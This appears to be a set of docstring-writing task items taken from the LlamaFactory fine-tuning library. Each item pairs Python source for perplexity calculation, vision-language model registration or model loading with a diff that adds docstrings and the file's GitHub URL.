# limitations under the License.
import json
from dataclasses import dataclass
from typing import Any, Literal
import fire
import torch
from torch.utils.data import DataLoader
from tqdm import tqdm
from transformers import DataCollatorForLanguageModeling
from llamafactory.data import MultiModalDataCollatorForSeq2Seq, get_dataset, get_template_and_fix_tokenizer
from llamafactory.extras.constants import IGNORE_INDEX
from llamafactory.hparams import get_train_args
from llamafactory.model import load_model, load_tokenizer
@dataclass
class PairwiseDataCollatorWithPadding(MultiModalDataCollatorForSeq2Seq):
train_on_prompt: bool = False
def __call__(self, features: list[dict[str, Any]]) -> dict[str, torch.Tensor]:
chosen_features = []
for feature in features:
chosen_features.append(
{
"input_ids": feature["chosen_input_ids"],
"attention_mask": feature["chosen_attention_mask"],
"labels": feature["chosen_input_ids"] if self.train_on_prompt else feature["chosen_labels"],
"images": feature["images"],
"videos": feature["videos"],
"audios": feature["audios"],
}
)
return super().__call__(chosen_features)
def calculate_ppl(
model_name_or_path: str,
save_name: str = "ppl.json",
batch_size: int = 4,
stage: Literal["pt", "sft", "rm"] = "sft",
dataset: str = "alpaca_en_demo",
dataset_dir: str = "data",
template: str = "default",
cutoff_len: int = 2048,
max_samples: int | None = None,
train_on_prompt: bool = False,
):
model_args, data_args, training_args, finetuning_args, _ = get_train_args(
dict(
stage=stage,
model_name_or_path=model_name_or_path,
dataset=dataset,
dataset_dir=dataset_dir,
template=template,
cutoff_len=cutoff_len,
max_samples=max_samples,
train_on_prompt=train_on_prompt,
preprocessing_num_workers=16,
output_dir="dummy_dir",
overwrite_cache=True,
do_train=True,
)
)
tokenizer_module = load_tokenizer(model_args)
tokenizer = tokenizer_module["tokenizer"]
template = get_template_and_fix_tokenizer(tokenizer, data_args)
trainset = get_dataset(template, model_args, data_args, training_args, stage, **tokenizer_module)["train_dataset"]
model = load_model(tokenizer, model_args, finetuning_args, is_trainable=False)
if stage == "pt":
data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm=False)
elif stage == "sft":
data_collator = MultiModalDataCollatorForSeq2Seq(
template=template, tokenizer=tokenizer, label_pad_token_id=IGNORE_INDEX
)
elif stage == "rm":
data_collator = PairwiseDataCollatorWithPadding(
template=template, tokenizer=tokenizer, label_pad_token_id=IGNORE_INDEX, train_on_prompt=train_on_prompt
)
else:
raise NotImplementedError(f"Stage does not supported: {stage}.")
dataloader = DataLoader(trainset, batch_size, shuffle=False, collate_fn=data_collator, pin_memory=True)
criterion = torch.nn.CrossEntropyLoss(reduction="none")
total_ppl = 0
perplexities = []
batch: dict[str, torch.Tensor]
with torch.no_grad():
for batch in tqdm(dataloader, desc="Computing perplexities"):
batch = batch.to(model.device)
outputs = model(**batch)
shift_logits: torch.Tensor = outputs["logits"][..., :-1, :]
shift_labels: torch.Tensor = batch["labels"][..., 1:]
loss_mask = shift_labels != IGNORE_INDEX
flatten_logits = shift_logits.contiguous().view(shift_labels.size(0) * shift_labels.size(1), -1)
flatten_labels = shift_labels.contiguous().view(-1)
token_logps: torch.Tensor = criterion(flatten_logits, flatten_labels)
token_logps = token_logps.contiguous().view(shift_logits.size(0), -1)
sentence_logps = (token_logps * loss_mask).sum(-1) / loss_mask.sum(-1)
total_ppl += sentence_logps.exp().sum().item()
perplexities.extend(sentence_logps.exp().tolist())
with open(save_name, "w", encoding="utf-8") as f:
json.dump(perplexities, f, indent=2)
print(f"Average perplexity is {total_ppl / len(perplexities):.2f}")
print(f"Perplexities have been saved at {save_name}.")
if __name__ == "__main__":
fire.Fire(calculate_ppl) | --- +++ @@ -30,10 +30,12 @@
@dataclass
class PairwiseDataCollatorWithPadding(MultiModalDataCollatorForSeq2Seq):
+ r"""Data collator for pairwise data."""
train_on_prompt: bool = False
def __call__(self, features: list[dict[str, Any]]) -> dict[str, torch.Tensor]:
+ r"""Pad batched data to the longest sequence in the batch."""
chosen_features = []
for feature in features:
chosen_features.append(
@@ -62,6 +64,11 @@ max_samples: int | None = None,
train_on_prompt: bool = False,
):
+ r"""Calculate the ppl on the dataset of the pre-trained models.
+
+ Usage: export CUDA_VISIBLE_DEVICES=0
+ python cal_ppl.py --model_name_or_path path_to_model --dataset alpaca_en_demo --save_name ppl.json
+ """
model_args, data_args, training_args, finetuning_args, _ = get_train_args(
dict(
stage=stage,
@@ -124,4 +131,4 @@
if __name__ == "__main__":
- fire.Fire(calculate_ppl)+ fire.Fire(calculate_ppl)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/scripts/stat_utils/cal_ppl.py |
Write docstrings for utility functions | # Copyright 2025 HuggingFace Inc. and the LlamaFactory team.
#
# This code is inspired by the HuggingFace's Transformers library.
# https://github.com/huggingface/transformers/blob/v4.40.0/src/transformers/models/llava/modeling_llava.py
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import TYPE_CHECKING, Optional
import torch
import transformers
import transformers.models
from transformers.activations import ACT2FN
from ...extras import logging
from ...extras.packages import is_transformers_version_greater_than
if TYPE_CHECKING:
from transformers import LlavaConfig, PretrainedConfig, PreTrainedModel
from ...hparams import FinetuningArguments, ModelArguments
logger = logging.get_logger(__name__)
transformers_logger = transformers.utils.logging.get_logger(__name__)
@dataclass
class CompositeModel:
model_type: str
projector_key: str
vision_model_keys: list[str]
language_model_keys: list[str]
lora_conflict_keys: list[str]
def get_projector(self, module: "torch.nn.Module") -> "torch.nn.Module":
for key in self.projector_key.split("."):
module = getattr(module, key)
return module
COMPOSITE_MODELS: dict[str, "CompositeModel"] = {}
def _register_composite_model(
model_type: str,
projector_key: Optional[str] = None,
vision_model_keys: Optional[list[str]] = None,
language_model_keys: Optional[list[str]] = None,
lora_conflict_keys: Optional[list[str]] = None,
):
COMPOSITE_MODELS[model_type] = CompositeModel(
model_type=model_type,
projector_key=projector_key or "multi_modal_projector",
vision_model_keys=vision_model_keys or ["vision_tower"],
language_model_keys=language_model_keys or ["language_model", "lm_head"],
lora_conflict_keys=lora_conflict_keys or [],
)
class LlavaMultiModalProjectorForYiVL(torch.nn.Module):
    r"""Multimodal projector used by Yi-VL models.

    Projects vision features into the text embedding space via
    linear -> layernorm -> activation -> linear -> layernorm.
    """

    def __init__(self, config: "LlavaConfig") -> None:
        super().__init__()
        self.config = config
        if config is None:
            # Escape hatch for subclasses (see the vLLM variant below) that
            # build the layers themselves from explicit sizes.
            return

        self.linear_1 = torch.nn.Linear(config.vision_config.hidden_size, config.text_config.hidden_size, bias=True)
        self.linear_2 = torch.nn.LayerNorm(config.text_config.hidden_size, bias=True)
        self.linear_3 = torch.nn.Linear(config.text_config.hidden_size, config.text_config.hidden_size, bias=True)
        self.linear_4 = torch.nn.LayerNorm(config.text_config.hidden_size, bias=True)
        self.act = ACT2FN[config.projector_hidden_act]

    def forward(self, image_features: "torch.Tensor") -> "torch.Tensor":
        r"""Project ``image_features`` (vision hidden size in the last dim) to text hidden size."""
        hidden_states = self.linear_1(image_features)
        hidden_states = self.linear_2(hidden_states)
        hidden_states = self.act(hidden_states)
        hidden_states = self.linear_3(hidden_states)
        hidden_states = self.linear_4(hidden_states)
        if hidden_states.dtype == torch.float32:
            # The intermediate ops may have silently upcast to float32; cast back
            # to the dtype the rest of the model expects.
            if torch.is_autocast_enabled():
                target_dtype = torch.get_autocast_gpu_dtype()
            elif hasattr(self.config, "_pre_quantization_dtype"):
                # quantized models record their original dtype here
                target_dtype = self.config._pre_quantization_dtype
            else:
                target_dtype = self.linear_1.weight.dtype

            transformers_logger.warning_once("The hidden states seems to be silently casted in float32.")
            hidden_states = hidden_states.to(target_dtype)

        return hidden_states
class LlavaMultiModalProjectorForYiVLForVLLM(LlavaMultiModalProjectorForYiVL):
    r"""Yi-VL projector variant constructed from explicit sizes (vLLM-style signature)
    instead of a ``LlavaConfig`` object.
    """

    def __init__(self, vision_hidden_size: int, text_hidden_size: int, projector_hidden_act: str) -> None:
        # config=None makes the parent skip layer construction; layers are built
        # here from the explicit sizes instead.
        super().__init__(config=None)
        self.linear_1 = torch.nn.Linear(vision_hidden_size, text_hidden_size, bias=True)
        self.linear_2 = torch.nn.LayerNorm(text_hidden_size, bias=True)
        self.linear_3 = torch.nn.Linear(text_hidden_size, text_hidden_size, bias=True)
        self.linear_4 = torch.nn.LayerNorm(text_hidden_size, bias=True)
        self.act = ACT2FN[projector_hidden_act]
def autocast_projector_dtype(model: "PreTrainedModel", model_args: "ModelArguments") -> None:
    r"""Cast the multimodal projector's outputs to the training compute dtype.

    Only acts on quantized models whose ``model_type`` has a registered composite
    description; for every other model this function is a no-op.
    """
    if not getattr(model, "quantization_method", None):
        return

    model_type = getattr(model.config, "model_type", None)
    if model_type not in COMPOSITE_MODELS:
        return

    def _cast_output_to_compute_dtype(
        module: "torch.nn.Module", args: tuple["torch.Tensor"], output: "torch.Tensor"
    ) -> "torch.Tensor":
        # replace the projector output with a dtype-converted copy
        return output.to(model_args.compute_dtype)

    mm_projector = COMPOSITE_MODELS[model_type].get_projector(model)
    logger.info_rank0(f"Casting multimodal projector outputs in {model_args.compute_dtype}.")
    mm_projector.register_forward_hook(_cast_output_to_compute_dtype)
def configure_visual_model(config: "PretrainedConfig") -> None:
    r"""Patch VLM configs/classes before the model is instantiated."""
    text_config = getattr(config, "text_config", None)
    if text_config and not getattr(config, "hidden_size", None):
        # required for ds zero3 and valuehead models
        setattr(config, "hidden_size", getattr(text_config, "hidden_size", None))

    if getattr(config, "is_yi_vl_derived_model", None):
        # Yi-VL uses a non-standard projector; swap in our implementation globally.
        logger.info_rank0("Detected Yi-VL model, applying projector patch.")
        transformers.models.llava.modeling_llava.LlavaMultiModalProjector = LlavaMultiModalProjectorForYiVL
def get_forbidden_modules(config: "PretrainedConfig", finetuning_args: "FinetuningArguments") -> set[str]:
    r"""Collect submodule name prefixes that must stay frozen for VLM tuning.

    Returns an empty set for models without a registered composite description.
    """
    forbidden_modules: set[str] = set()
    composite = COMPOSITE_MODELS.get(getattr(config, "model_type", None))
    if composite is None:
        return forbidden_modules

    if finetuning_args.freeze_vision_tower:
        vision_model_keys = composite.vision_model_keys
        logger.info_rank0(f"Set vision model not trainable: {vision_model_keys}.")
        forbidden_modules.update(vision_model_keys)

    if finetuning_args.freeze_multi_modal_projector:
        projector_key = composite.projector_key
        logger.info_rank0(f"Set multi model projector not trainable: {projector_key}.")
        forbidden_modules.add(projector_key)

    if finetuning_args.freeze_language_model:
        language_model_keys = composite.language_model_keys
        logger.info_rank0(f"Set language model not trainable: {language_model_keys}.")
        forbidden_modules.update(language_model_keys)

    return forbidden_modules
def patch_target_modules(
    model: "PreTrainedModel", finetuning_args: "FinetuningArguments", target_modules: list[str]
) -> list[str]:
    r"""Expand LoRA target patterns to concrete module names, excluding frozen/conflicting ones.

    For models without a composite description the requested patterns are returned unchanged.
    """
    model_type = getattr(model.config, "model_type", None)
    if model_type not in COMPOSITE_MODELS:
        return target_modules

    forbidden_modules = get_forbidden_modules(model.config, finetuning_args)
    forbidden_modules.update(COMPOSITE_MODELS[model_type].lora_conflict_keys)
    # keep every module matching a target pattern unless it also matches a forbidden one
    return [
        name
        for name, _ in model.named_modules()
        if any(target in name for target in target_modules)
        and not any(forbidden in name for forbidden in forbidden_modules)
    ]
# --------------------------------------------------------------------------- #
# Composite model registrations. Omitted arguments fall back to the defaults
# in `_register_composite_model` (projector "multi_modal_projector", vision
# tower ["vision_tower"], language model ["language_model", "lm_head"]).
# --------------------------------------------------------------------------- #
_register_composite_model(
    model_type="dots_ocr",
    projector_key="vision_tower.merger",
    vision_model_keys=["vision_tower"],
    language_model_keys=["model", "lm_head"],
    lora_conflict_keys=["merger"],
)

_register_composite_model(
    model_type="gemma3",
)

_register_composite_model(
    model_type="gemma3n",
    vision_model_keys=["vision_tower", "audio_tower"],
    lora_conflict_keys=["timm_model", "subsample_conv_projection"],
)

# copied from qwen2vl
_register_composite_model(
    model_type="glm4v",
    projector_key="visual.merger",
    vision_model_keys=["visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="glm4v_moe",
    projector_key="visual.merger",
    vision_model_keys=["visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="glm_ocr",
    projector_key="visual.merger",
    vision_model_keys=["visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="internvl",
)

_register_composite_model(
    model_type="interns1",
)

_register_composite_model(
    model_type="Keye",
    projector_key="mlp_AR",
    vision_model_keys=["visual.vision_model.patch_embedding", "visual.vision_model.encoder"],
    language_model_keys=["model", "lm_head"],
    lora_conflict_keys=["patch_embedding"],
)

_register_composite_model(
    model_type="kimi_vl",
)

_register_composite_model(
    model_type="llama4",
    vision_model_keys=["vision_model"],
)

_register_composite_model(
    model_type="llava",
)

_register_composite_model(
    model_type="llava_next",
)

_register_composite_model(
    model_type="llava_next_video",
)

_register_composite_model(
    model_type="minicpmv",
    projector_key="resampler",
    vision_model_keys=["vpm"],
    language_model_keys=["llm"],
)

_register_composite_model(
    model_type="minicpmo",
    projector_key="resampler",
    vision_model_keys=["vpm", "apm", "audio_avg_pooler", "audio_projection_layer", "tts"],
    language_model_keys=["llm"],
    lora_conflict_keys=["audio_projection_layer"],
)

_register_composite_model(
    model_type="mistral3",
    projector_key="model.multi_modal_projector",
)

_register_composite_model(
    model_type="mllama",
    vision_model_keys=["vision_model"],
)

_register_composite_model(
    model_type="paligemma",
)

# audio-only composite model: the "vision" keys hold the audio encoder
_register_composite_model(
    model_type="qwen2_audio",
    vision_model_keys=["audio_tower"],
)

_register_composite_model(
    model_type="qwen2_5_omni_thinker",
    projector_key="visual.merger",
    vision_model_keys=["visual.patch_embed", "visual.blocks", "audio_tower"],
    language_model_keys=["model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

# transformers 4.52.0 renamed the inner module, hence the version switch below
_register_composite_model(
    model_type="qwen2_vl",
    projector_key="visual.merger",
    vision_model_keys=["visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"]
    if is_transformers_version_greater_than("4.52.0")
    else ["model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="qwen2_5_vl",
    projector_key="visual.merger",
    vision_model_keys=["visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"]
    if is_transformers_version_greater_than("4.52.0")
    else ["model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="qwen3_vl",
    projector_key="visual.merger",
    vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks", "visual.deepstack_merger_list"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="qwen3_vl_moe",
    projector_key="visual.merger",
    vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks", "visual.deepstack_merger_list"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="qwen3_omni_moe_thinker",
    projector_key="visual.merger",
    vision_model_keys=[
        "visual.pos_embed",
        "visual.patch_embed",
        "visual.blocks",
        "visual.deepstack_merger_list",
        "audio_tower",
    ],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="qwen3_5",
    projector_key="model.visual.merger",
    vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)

_register_composite_model(
    model_type="qwen3_5_moe",
    projector_key="model.visual.merger",
    vision_model_keys=["visual.pos_embed", "visual.patch_embed", "visual.blocks"],
    language_model_keys=["language_model", "lm_head"],
    lora_conflict_keys=["patch_embed"],
)
_register_composite_model(
model_type="video_llava",
) | --- +++ @@ -62,6 +62,16 @@ language_model_keys: Optional[list[str]] = None,
lora_conflict_keys: Optional[list[str]] = None,
):
+ r"""Register a new composite model.
+
+ Args:
+ model_type: model type
+ projector_key: multi_modal_projector
+ vision_model_keys: vision_tower
+ language_model_keys: language_model
+ lora_conflict_keys: None
+
+ """
COMPOSITE_MODELS[model_type] = CompositeModel(
model_type=model_type,
projector_key=projector_key or "multi_modal_projector",
@@ -117,6 +127,7 @@
def autocast_projector_dtype(model: "PreTrainedModel", model_args: "ModelArguments") -> None:
+ r"""Cast projector output to half precision for fine-tuning quantized VLMs."""
def _mm_projector_forward_post_hook(
module: "torch.nn.Module", args: tuple["torch.Tensor"], output: "torch.Tensor"
@@ -135,6 +146,7 @@
def configure_visual_model(config: "PretrainedConfig") -> None:
+ r"""Patch VLMs before loading them."""
if getattr(config, "text_config", None) and not getattr(config, "hidden_size", None):
# required for ds zero3 and valuehead models
setattr(config, "hidden_size", getattr(config.text_config, "hidden_size", None))
@@ -145,6 +157,7 @@
def get_forbidden_modules(config: "PretrainedConfig", finetuning_args: "FinetuningArguments") -> set[str]:
+ r"""Freeze vision tower and language model for VLM full/freeze tuning."""
model_type = getattr(config, "model_type", None)
forbidden_modules = set()
if model_type in COMPOSITE_MODELS:
@@ -169,6 +182,7 @@ def patch_target_modules(
model: "PreTrainedModel", finetuning_args: "FinetuningArguments", target_modules: list[str]
) -> list[str]:
+ r"""Freeze vision tower for VLM LoRA tuning."""
model_type = getattr(model.config, "model_type", None)
if model_type in COMPOSITE_MODELS:
forbidden_modules = get_forbidden_modules(model.config, finetuning_args)
@@ -401,4 +415,4 @@
_register_composite_model(
model_type="video_llava",
-)+)
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/model/model_utils/visual.py |
Generate docstrings for exported functions | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import TYPE_CHECKING, Any, Optional, TypedDict
import torch
from transformers import (
AutoConfig,
AutoModelForCausalLM,
AutoModelForImageTextToText,
AutoModelForSeq2SeqLM,
AutoModelForTextToWaveform,
AutoProcessor,
AutoTokenizer,
)
from trl import AutoModelForCausalLMWithValueHead
from ..extras import logging
from ..extras.misc import count_parameters, skip_check_imports, try_download_model_from_other_hub
from ..extras.packages import is_torch_version_greater_than
from .adapter import init_adapter
from .model_utils.ktransformers import load_kt_pretrained_model
from .model_utils.liger_kernel import apply_liger_kernel
from .model_utils.misc import register_autoclass
from .model_utils.mod import convert_pretrained_model_to_mod, load_mod_pretrained_model
from .model_utils.unsloth import load_unsloth_pretrained_model
from .model_utils.valuehead import load_valuehead_params
from .patcher import patch_config, patch_model, patch_processor, patch_tokenizer, patch_valuehead_model
if TYPE_CHECKING:
from transformers import PretrainedConfig, PreTrainedModel, PreTrainedTokenizer, ProcessorMixin
from ..hparams import FinetuningArguments, ModelArguments
logger = logging.get_logger(__name__)
class TokenizerModule(TypedDict):
    r"""Bundle returned by `load_tokenizer`."""

    # always present
    tokenizer: "PreTrainedTokenizer"
    # None when no usable processor could be loaded (e.g. text-only models)
    processor: Optional["ProcessorMixin"]
def _get_init_kwargs(model_args: "ModelArguments") -> dict[str, Any]:
    r"""Build the common kwargs used to load config/tokenizer/model.

    Note: mutates ``model_args`` in place — ``model_name_or_path`` may be
    rewritten to a locally downloaded path.
    """
    skip_check_imports()
    model_args.model_name_or_path = try_download_model_from_other_hub(model_args)
    init_kwargs: dict[str, Any] = {
        "trust_remote_code": model_args.trust_remote_code,
        "cache_dir": model_args.cache_dir,
        "revision": model_args.model_revision,
        "token": model_args.hf_hub_token,
    }
    return init_kwargs
def load_tokenizer(model_args: "ModelArguments") -> "TokenizerModule":
    r"""Load the pretrained tokenizer and, when available, its processor.

    Note: mutates ``model_args`` via ``_get_init_kwargs``.
    Raises OSError when the tokenizer cannot be loaded at all.
    """
    init_kwargs = _get_init_kwargs(model_args)
    try:
        tokenizer = AutoTokenizer.from_pretrained(
            model_args.model_name_or_path,
            use_fast=model_args.use_fast_tokenizer,
            split_special_tokens=model_args.split_special_tokens,
            padding_side="right",
            **init_kwargs,
        )
    except ValueError:  # try another one: retry with the opposite fast/slow setting
        tokenizer = AutoTokenizer.from_pretrained(
            model_args.model_name_or_path,
            use_fast=not model_args.use_fast_tokenizer,
            padding_side="right",
            **init_kwargs,
        )
    except Exception as e:
        # the tokenizer is mandatory, unlike the processor below
        raise OSError("Failed to load tokenizer.") from e

    patch_tokenizer(tokenizer, model_args)
    try:
        processor = AutoProcessor.from_pretrained(
            model_args.model_name_or_path,
            use_fast=model_args.use_fast_tokenizer,
            **init_kwargs,
        )
    except ValueError:  # try another one: retry with the opposite fast/slow setting
        processor = AutoProcessor.from_pretrained(
            model_args.model_name_or_path,
            use_fast=not model_args.use_fast_tokenizer,
            **init_kwargs,
        )
    except Exception as e:
        # processor is optional: text-only models simply don't have one
        logger.info_rank0(f"Failed to load processor: {e}.")
        processor = None

    # Avoid load tokenizer, see:
    # https://github.com/huggingface/transformers/blob/v4.40.0/src/transformers/models/auto/processing_auto.py#L324
    if processor is not None and "Processor" not in processor.__class__.__name__:
        # AutoProcessor may fall back to returning a tokenizer; discard it
        logger.debug("The loaded processor is not an instance of Processor. Dropping it.")
        processor = None

    if processor is not None:
        patch_processor(processor, tokenizer, model_args)

    return {"tokenizer": tokenizer, "processor": processor}
def load_config(model_args: "ModelArguments") -> "PretrainedConfig":
    r"""Load the model config, resolving download/auth kwargs from ``model_args``."""
    return AutoConfig.from_pretrained(model_args.model_name_or_path, **_get_init_kwargs(model_args))
def load_model(
    tokenizer: "PreTrainedTokenizer",
    model_args: "ModelArguments",
    finetuning_args: "FinetuningArguments",
    is_trainable: bool = False,
    add_valuehead: bool = False,
) -> "PreTrainedModel":
    r"""Load the pretrained model, apply patches/adapters, and set its train/eval mode.

    Args:
        tokenizer: tokenizer returned by `load_tokenizer` (used for patching).
        model_args: model loading arguments (mutated via `_get_init_kwargs`).
        finetuning_args: fine-tuning arguments (stage, adapters, freezing).
        is_trainable: whether the model is being prepared for training.
        add_valuehead: whether to wrap the model with a value head (e.g. for RLHF).
    """
    init_kwargs = _get_init_kwargs(model_args)
    config = load_config(model_args)
    patch_config(config, tokenizer, model_args, init_kwargs, is_trainable)
    # liger kernel needs logits for stages other than pt/sft
    apply_liger_kernel(config, model_args, is_trainable, require_logits=(finetuning_args.stage not in ["pt", "sft"]))

    model = None
    lazy_load = False
    if model_args.use_kt:
        # ktransformers backend: optional dependency, imported lazily
        from ktransformers.sft.monkey_patch_torch_module import install_patch

        install_patch()
        model = load_kt_pretrained_model(config, model_args)
    elif model_args.use_unsloth:
        if model_args.adapter_name_or_path is not None:
            # unsloth loads base model and adapter together later
            lazy_load = True
        elif is_trainable:
            model = load_unsloth_pretrained_model(config, model_args, finetuning_args)

    if model is None and not lazy_load:
        init_kwargs["config"] = config
        init_kwargs["pretrained_model_name_or_path"] = model_args.model_name_or_path
        init_kwargs["torch_dtype"] = "auto"

        if model_args.mixture_of_depths == "load":
            model = load_mod_pretrained_model(**init_kwargs)
        else:
            # pick the narrowest auto class whose mapping knows this config type
            if type(config) in AutoModelForImageTextToText._model_mapping.keys():  # image-text
                load_class = AutoModelForImageTextToText
            elif type(config) in AutoModelForSeq2SeqLM._model_mapping.keys():  # audio-text
                load_class = AutoModelForSeq2SeqLM
            elif type(config) in AutoModelForTextToWaveform._model_mapping.keys():  # audio-text for qwen omni
                load_class = AutoModelForTextToWaveform
            else:
                load_class = AutoModelForCausalLM

            if model_args.train_from_scratch:
                model = load_class.from_config(config, trust_remote_code=model_args.trust_remote_code)
            else:
                model = load_class.from_pretrained(**init_kwargs)

            if getattr(model.config, "model_type", None) in ["qwen2_5_omni", "qwen3_omni_moe"]:
                # omni models wrap the LM part in a "thinker" submodule
                model = getattr(model, "thinker")

        if model_args.mixture_of_depths == "convert":
            model = convert_pretrained_model_to_mod(model, config, model_args)

    if not lazy_load:
        patch_model(model, tokenizer, model_args, is_trainable, add_valuehead)
        register_autoclass(config, model, tokenizer)

    model = init_adapter(config, model, model_args, finetuning_args, is_trainable)
    if add_valuehead:
        model = AutoModelForCausalLMWithValueHead.from_pretrained(model)
        patch_valuehead_model(model)

        # the value head checkpoint lives with the last adapter if one is given
        if model_args.adapter_name_or_path is not None:
            vhead_path = model_args.adapter_name_or_path[-1]
        else:
            vhead_path = model_args.model_name_or_path

        vhead_params = load_valuehead_params(vhead_path, model_args)
        if vhead_params is not None:
            model.load_state_dict(vhead_params, strict=False)
            logger.info_rank0(f"Loaded valuehead from checkpoint: {vhead_path}")

    # Conv3D is not recommended when using torch 2.9.x
    if is_torch_version_greater_than("2.9.0") and not is_torch_version_greater_than("2.10.0"):
        if any(isinstance(m, torch.nn.Conv3d) for m in model.modules()):
            raise ValueError(
                "Unsupported torch version detected: torch 2.9.x with Conv3D. "
                "This combination is known to cause severe performance regression. "
                "Please downgrade torch to <2.9 or remove Conv3D. "
                "See https://github.com/pytorch/pytorch/issues/166122"
            )

    if not is_trainable:
        model.requires_grad_(False)
        model.eval()
    else:
        model.train()

    # Borrowing the kernel plugins ability of v1 to temporarily apply the NPU fusion operator to v0,
    # it is turned off by default, and can be discarded after the transition period ends.
    if model_args.use_v1_kernels and is_trainable:
        logger.warning_rank0(
            "You are try to using future feature about kernels, please note that this feature "
            "is not supported for all models. If get any error, please disable this feature, or report the issue."
        )
        from ..v1.plugins.model_plugins.kernels.interface import apply_default_kernels

        model = apply_default_kernels(model, include_kernels=model_args.use_v1_kernels)

    trainable_params, all_param = count_parameters(model)
    if is_trainable:
        param_stats = (
            f"trainable params: {trainable_params:,} || "
            f"all params: {all_param:,} || trainable%: {100 * trainable_params / all_param:.4f}"
        )
    else:
        param_stats = f"all params: {all_param:,}"

    logger.info_rank0(param_stats)

    if model_args.print_param_status and int(os.getenv("LOCAL_RANK", "0")) == 0:
        # debug dump of every parameter; rank 0 only
        for name, param in model.named_parameters():
            print(f"name: {name}, dtype: {param.dtype}, device: {param.device}, trainable: {param.requires_grad}")
return model | --- +++ @@ -55,6 +55,10 @@
def _get_init_kwargs(model_args: "ModelArguments") -> dict[str, Any]:
+ r"""Get arguments to load config/tokenizer/model.
+
+ Note: including inplace operation of model_args.
+ """
skip_check_imports()
model_args.model_name_or_path = try_download_model_from_other_hub(model_args)
return {
@@ -66,6 +70,10 @@
def load_tokenizer(model_args: "ModelArguments") -> "TokenizerModule":
+ r"""Load pretrained tokenizer and optionally loads processor.
+
+ Note: including inplace operation of model_args.
+ """
init_kwargs = _get_init_kwargs(model_args)
try:
tokenizer = AutoTokenizer.from_pretrained(
@@ -116,6 +124,7 @@
def load_config(model_args: "ModelArguments") -> "PretrainedConfig":
+ r"""Load model config."""
init_kwargs = _get_init_kwargs(model_args)
return AutoConfig.from_pretrained(model_args.model_name_or_path, **init_kwargs)
@@ -127,6 +136,7 @@ is_trainable: bool = False,
add_valuehead: bool = False,
) -> "PreTrainedModel":
+ r"""Load pretrained model."""
init_kwargs = _get_init_kwargs(model_args)
config = load_config(model_args)
patch_config(config, tokenizer, model_args, init_kwargs, is_trainable)
@@ -234,4 +244,4 @@ for name, param in model.named_parameters():
print(f"name: {name}, dtype: {param.dtype}, device: {param.device}, trainable: {param.requires_grad}")
- return model+ return model
| https://raw.githubusercontent.com/hiyouga/LlamaFactory/HEAD/src/llamafactory/model/loader.py |
Add docstrings that explain logic | # Copyright 2025 the LlamaFactory team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from ...extras import logging
from .visual import COMPOSITE_MODELS
if TYPE_CHECKING:
from transformers import PretrainedConfig, PreTrainedModel, PreTrainedTokenizer
logger = logging.get_logger(__name__)
def find_all_linear_modules(model: "PreTrainedModel", freeze_vision_tower: bool) -> list[str]:
    r"""Find all available linear modules to apply LoRA, GaLore or APOLLO.

    Returns the deduplicated leaf names (last dotted component) of every
    Linear-like module that is not part of a forbidden submodule.
    """
    model_type = getattr(model.config, "model_type", None)
    forbidden_modules = {"lm_head"}
    # some architectures name their output projection differently
    if model_type == "chatglm":
        forbidden_modules.add("output_layer")
    elif model_type == "internlm2":
        forbidden_modules.add("output")

    composite = COMPOSITE_MODELS.get(model_type)
    if composite is not None:
        forbidden_modules.add(composite.projector_key)
        if freeze_vision_tower:
            forbidden_modules.update(composite.vision_model_keys)

    module_names = set()
    for name, module in model.named_modules():
        if any(forbidden in name for forbidden in forbidden_modules):
            continue

        cls_name = module.__class__.__name__
        if "Linear" in cls_name and "Embedding" not in cls_name:
            module_names.add(name.split(".")[-1])

    logger.info_rank0("Found linear modules: {}".format(",".join(module_names)))
    return list(module_names)
def find_expanded_modules(model: "PreTrainedModel", target_modules: list[str], num_layer_trainable: int) -> list[str]:
